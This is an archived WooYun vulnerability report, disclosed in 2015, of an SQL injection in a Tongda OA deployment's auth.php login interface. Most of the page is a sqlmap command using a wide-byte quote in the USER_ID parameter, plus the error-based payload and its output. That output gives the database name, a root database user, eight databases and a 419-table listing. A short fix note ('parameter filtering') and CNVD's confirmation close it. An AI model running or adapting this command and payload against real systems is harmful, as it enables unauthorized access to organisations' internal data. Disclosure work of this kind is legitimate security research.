乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-22: 细节已通知厂商并且等待厂商处理中 2015-10-26: 厂商已经确认,细节仅向厂商公开 2015-11-05: 细节向核心白帽子及相关领域专家公开 2015-11-15: 细节向普通白帽子公开 2015-11-25: 细节向实习白帽子公开 2015-12-10: 细节向公众公开
sqlmap -u "**.**.**.**/interface/auth.php?&PASSWORD=1&USER_ID=%df%27%20" --dbms mysql --tamper=between
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: USER_ID Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: &PASSWORD=1&USER_ID=%df' AND (SELECT 9859 FROM(SELECT COUNT(*),CONCAT(0x7169726871,(SELECT (CASE WHEN (9859=9859) THEN 1 ELSE 0 END)),0x7172706871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- hKjO---web application technology: Apacheback-end DBMS: MySQL >= 5.0.0current database: 'td_oa'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: USER_ID Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: &PASSWORD=1&USER_ID=%df' AND (SELECT 9859 FROM(SELECT COUNT(*),CONCAT(0x7169726871,(SELECT (CASE WHEN (9859=9859) THEN 1 ELSE 0 END)),0x7172706871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- hKjO---web application technology: Apacheback-end DBMS: MySQL >= 5.0.0current user: 'root@**.**.**.**'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: USER_ID Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: &PASSWORD=1&USER_ID=%df' AND (SELECT 9859 FROM(SELECT COUNT(*),CONCAT(0x7169726871,(SELECT (CASE WHEN (9859=9859) THEN 1 ELSE 0 END)),0x7172706871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- hKjO---web application technology: Apacheback-end DBMS: MySQL >= 5.0.0available databases [8]:[*] BUS[*] crscell[*] information_schema[*] mysql[*] performance_schema[*] TD_OA[*] TD_OA_ARCHIVE[*] TRAINsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: USER_ID Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: &PASSWORD=1&USER_ID=%df' AND (SELECT 9859 FROM(SELECT COUNT(*),CONCAT(0x7169726871,(SELECT (CASE WHEN (9859=9859) THEN 1 ELSE 0 END)),0x7172706871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- hKjO---sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: USER_ID Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: &PASSWORD=1&USER_ID=%df' AND (SELECT 9859 FROM(SELECT COUNT(*),CONCAT(0x7169726871,(SELECT (CASE WHEN (9859=9859) THEN 1 ELSE 0 END)),0x7172706871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- hKjO---web application technology: Apacheback-end DBMS: MySQL >= 5.0.0Database: TD_OA[419 tables]+----------------------------------+| session || user || version || address || address_group || affair || app_log || archive_tables || attachment || attachment_edit || attachment_module || attachment_position || attend_ask_duty || attend_config || attend_duty || attend_duty_shift || attend_evection || attend_holiday || attend_leave || attend_leave_manager || attend_machine || attend_manager || attend_out || attendance_overtime || bbs_board || bbs_comment || book_info || book_manage || book_manager || book_type || bs_line || calendar || categories_type || censor_data || censor_module || censor_words || chatroom || connect_config || connect_db || contact || contract || contract_line || countdown || cp_asset_keep || cp_asset_reflect || cp_asset_type || cp_assetcfg || cp_cptl_info || cp_dpct_sub || cp_prcs_prop || crm_account || crm_account_care || crm_account_contact || crm_action || crm_complain || crm_contract || crm_customer_service || crm_depository || crm_diary_setting || crm_email_html_model || crm_html_model || crm_marketing || crm_opportunity || crm_opportunity_products_list || crm_order || crm_order_products_list || crm_procurement_payment || crm_product || crm_product_type || crm_purchase_order || crm_purchase_order_products_list || crm_quotation || crm_quotation_products_list || crm_salepay || crm_solutions || crm_stockout || crm_stockout_products_list || crm_storage || crm_storage_products_list || crm_supplier || crm_supplier_contact || crm_sys_audit || crm_sys_code || crm_sys_code_type || crm_sys_entity || crm_sys_entity_index || crm_sys_entity_op || crm_sys_fast_new || crm_sys_field || crm_sys_layout_block || crm_sys_layout_item || crm_sys_list_view || crm_sys_list_view_color || crm_sys_list_view_default || crm_sys_list_view_field || crm_sys_list_view_map || crm_sys_list_view_order || crm_sys_list_view_rule || crm_sys_list_view_rule_parent || crm_sys_op || crm_sys_op_priv || crm_sys_op_priv_template || crm_sys_picklist || crm_sys_quick_link || crm_sys_relation || crm_sys_remind || crm_sys_remind_para || crm_sys_report || crm_sys_report_chart || crm_sys_report_column || crm_sys_report_dir || crm_sys_report_filter || crm_sys_report_filter_parent || crm_sys_report_group || crm_sys_report_summary || crm_sys_report_sysdefine || crm_sys_search || crm_sys_status || crm_sys_status_type || crm_sys_uv || crm_sys_uv_field || customer || daemon_config || daemon_hardware_info || daemon_process_info || daemon_services_config || daemon_services_status || daemon_services_tmp || data_source || data_source_field || data_src || db_server || department || dept_map || diary || diary_comment || diary_comment_reply || diary_share || doc_keywords || doc_print_log || doc_recv_data || doc_recv_prcs || doc_recv_priv || doc_send_data || doc_send_prcs || doc_type || doc_user_data || doc_user_data2 || efax_account || efax_receive_box || efax_send_box || email || email_body || email_box || email_boxgroup || email_name || esb_info || esb_msg_recv || esb_msg_send || esb_workflow || esb_workflow_model || esb_workflow_model_send || esb_workflow_rule || exam_data || exam_flow || exam_paper || exam_quiz || exam_quiz_set || ext_dept || ext_user || field_date || fieldsetting || file_content || file_sort || flow_data_106 || flow_data_107 || flow_data_108 || flow_data_109 || flow_data_111 || flow_data_112 || flow_data_113 || flow_data_114 || flow_data_116 || flow_data_117 || flow_data_118 || flow_data_119 || flow_data_12 || flow_data_120 || flow_data_121 || flow_data_122 || flow_data_123 || flow_data_124 || flow_data_125 || flow_data_126 || flow_data_127 || flow_data_128 || flow_data_129 || flow_data_130 || flow_data_131 || flow_data_132 || flow_data_133 || flow_data_134 || flow_data_135 || flow_data_136 || flow_data_137 || flow_data_138 || flow_data_3 || flow_data_32 || flow_data_35 || flow_data_64 || flow_form_type || flow_form_version || flow_hook || flow_manage_log || flow_print_tpl || flow_priv || flow_process || flow_query_tpl || flow_report || flow_report_priv || flow_rule || flow_run || flow_run_attach || flow_run_data || flow_run_feedback || flow_run_hook || flow_run_log || flow_run_prcs || flow_sort || flow_timer || flow_type || flow_version || form_sort || gbt_conf || gwiki_cate || gwiki_fav || gwiki_log || gwiki_priv || gwiki_tag || gwiki_template || gwiki_term || gwiki_term_final || gwiki_term_temp || hr_card_module || hr_care_task || hr_code || hr_insurance_default || hr_insurance_manage || hr_insurance_para || hr_integral_data || hr_integral_item || hr_integral_item_type || hr_integral_oa || hr_manager || hr_recruit_filter || hr_recruit_plan || hr_recruit_pool || hr_recruit_recruitment || hr_recruit_requirements || hr_sal_data || hr_staff_care || hr_staff_contract || hr_staff_incentive || hr_staff_info || hr_staff_labor_skills || hr_staff_learn_experience || hr_staff_leave || hr_staff_license || hr_staff_reinstatement || hr_staff_relatives || hr_staff_title_evaluation || hr_staff_transfer || hr_staff_work_experience || hr_training_examine || hr_training_plan || hr_training_record || hr_wage_manage || hr_welfare_manage || hrms || html_model || icqcontact_tb || im_cluster || im_discuss_group || im_discuss_maxmsgid || im_discuss_msg || im_group || im_group_maxmsgid || im_group_msg || im_message_cache || im_offline_file || index_article || index_keyword || index_search || interface || ip_rule || itask || itask_body || itask_category || itask_idea || itask_log || itask_msg || itask_tag || linkman || login_app || meeting || meeting_comment || meeting_equipment || meeting_room || meeting_rule || message || message2 || mobile_device || mobile_seal || module_priv || mytable || netchat || netdisk || netmeeting || news || news_comment || notes || notify || oa_cyclesource_used || oa_source || oa_source_used || oc_log || office_depository || office_products || office_task || office_transhistory || office_type || order_line || picture || plan_type || portal || product || proj_bug || proj_comment || proj_cost || proj_field_date || proj_fieldsetting || proj_file || proj_file_log || proj_file_sort || proj_forum || proj_priv || proj_project || proj_sys_code || proj_task || proj_task_log || provider || provider_linkman || rms_file || rms_lend || rms_roll || rms_roll_room || sal_data || sal_flow || sal_item || sale_history || sale_manager || score_date || score_flow || score_group || score_item || score_self_data || seal || seal_keylic || seal_log || secure_key || secure_log || secure_rule || service || sms || sms2 || sms2_priv || sms3 || sms_body || supply_history || supply_order || sys_code || sys_function || sys_log || sys_menu || sys_para || task || taskcenter || unit || url || user_ext || user_group || user_map || user_online || user_priv || vehicle || vehicle_maintenance || vehicle_oil_use || vehicle_operator || vehicle_usage || vi_flow_run || vi_user || vote_data || vote_item || vote_title || webmail || webmail_body || weixun_share || weixun_share_topic || wiki_ask || wiki_ask_answer || wiki_comment || wiki_info || winexe || word_model || work_detail || work_person || work_plan || zbap_paiban || zl_file |+----------------------------------+
参数过滤
危害等级:高
漏洞Rank:10
确认时间:2015-10-26 16:49
CNVD确认并复现所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置.
暂无